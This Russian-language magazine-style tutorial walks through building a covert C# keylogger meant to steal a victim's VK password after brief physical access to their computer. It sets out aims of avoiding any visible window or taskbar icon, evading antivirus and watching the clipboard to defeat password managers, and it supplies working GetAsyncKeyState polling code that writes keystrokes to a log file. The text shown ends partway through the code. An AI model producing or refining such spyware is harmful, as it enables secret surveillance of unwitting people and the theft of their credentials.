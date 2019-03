Боевые кейлоггеры с кучей функций и защитой от детекта могут стоить десятки, если не сотни долларов. Но кейлоггер не такая уж сложная штука, и при желании ты можешь сделать собственный и даже избежать детекта антивирусами. В этой статье я покажу, как это делается, а заодно поупражняемся в разработке программ на C#.

Ставим задачу

Мудрить не будем и ограничимся необходимым минимумом. Предположим, мы хотим заполучить пароль жертвы от ВК и мы можем ненадолго получить физический доступ к компьютеру. При этом:

мы не беспокоим жертву лишними окнами, иконками в таскбаре, сообщениями об ошибках и подобным;

мы имеем доступ к целевому компьютеру только однократно и на очень короткий срок;

мы сможем забирать логи, находясь в той же локальной сети;

антивирус должен молчать;

файрвол не учитываем и предполагаем, что мы дадим ему разрешение вручную при подсадке кейлоггера;

мы не будем пытаться скрывать процесс и только дадим ему неприметное название.

Еще жертва может пользоваться парольным менеджером, тогда в логе мы получим только Ctrl-C и Ctrl-V. На этот случай будем мониторить еще и содержимое буфера обмена.

INFO Подробнее об атаках на парольные менеджеры читай в статье «Ищем слабые места современных менеджеров паролей».

Писать будем на C# в Visual Studio. Забегая вперед, скажу, что в результате у меня получилось две версии программы — одна работает через перехват WinAPI, другую я про себя называю «костыльной». Но эта менее красивая версия дает другие результаты при проверке антивирусами, поэтому расскажу и о ней.

Теория

Когда ты нажимаешь на кнопку, операционка посылает уведомления тем программам, которые хотят об этом узнать. Поэтому самый простой способ перехватить ввод с клавиатуры — это принимать сообщения о нажатиях клавиш. Если мы этого сделать не можем (например, функция SetWindowsHookEx запрещена антивирусом или еще чем-либо), можно тянуть сырой ввод и без нее. Есть такая функция — GetAsyncKeyState, которая принимает номер клавиши и позволяет узнать, зажата она или отжата в момент вызова. Собственно, алгоритм действий будет такой: раз в N мс опрашиваем все кнопки и узнаем их состояние, занося нажатые в специальный список. Затем список обрабатываем, учитывая состояние клавиши Caps Lock, Num Lock, Shift, Ctrl и так далее. Полученные данные будем записывать в файл.

Пишем код

Для начала откроем Visual Studio и создадим новый проект Windows Forms (.NET Framework). Почему именно Windows Forms? Если мы выберем обычное консольное приложение, то при каждом запуске будет создаваться некрасивое черное окошко, а ведь юзера мы договорились не беспокоить. Также, пока мы не создали форму (а создавать ее мы и не будем), никаких значков в таскбаре не появится — важная часть скрытой работы. Теперь удаляй автоматически созданный файл Form1.cs со всеми потрохами и открывай Program.cs.

Здесь нас уже поджидает шаблон программы, но он не будет работать просто так. Первым делом надо убрать строчки 10–12 и 16–18. Теперь меняем объявление метода со static void Main() на static void Main(String[] args) . Нужно это для того, чтобы мы могли определить свои аргументы при перезапуске.

Теперь добавим using System.IO; для работы с файлами, System.Runtime.InteropServices для работы с WinAPI и System.Threading для приостановки потока. Если ты не хочешь писать костыльный вариант, лучше пропусти этот раздел и сразу переходи к следующему.

Импортируем GetAsyncKeyState из user32.dll:

[DllImport("user32.dll")] public static extern int GetAsyncKeyState(Int32 i);

И добавляем собственно логирование нажатий, собирая их по десять штук, чтобы не делать слишком много дисковых операций:

while (true) { Thread.Sleep(100); for (int i = 0; i < 255; i++) { int state = GetAsyncKeyState(i); if (state != 0) { buf += ((Keys)i).ToString(); if (buf.Length > 10) { File.AppendAllText("keylogger.log", buf); buf = ""; } } } }

Выглядит не очень красиво, а про читабельность вообще можно забыть. Во-первых, наш код тянет ввод не только с клавиатуры, но и с мыши (всякие LButton и RButton). Поэтому давай не будем записывать нажатие, если это не символьная клавиша. Заменим содержимое if в цикле на это:

// Усовершенствованная проверка введенных символов // if (((Keys)i) == Keys.Space) { buf += " "; continue; } if (((Keys)i) == Keys.Enter) { buf += "\r

"; continue; } if (((Keys)i) == Keys.LButton ||((Keys)i) == Keys.RButton ||((Keys)i) == Keys.MButton) continue; if (((Keys)i).ToString().Length == 1) { buf += ((Keys)i).ToString(); } else { buf += $"<{((Keys)i).ToString()}>"; } if (buf.Length > 10) { File.AppendAllText("keylogger.log", buf); buf = ""; }

После такого редактирования лог стал намного чище (см. рисунок).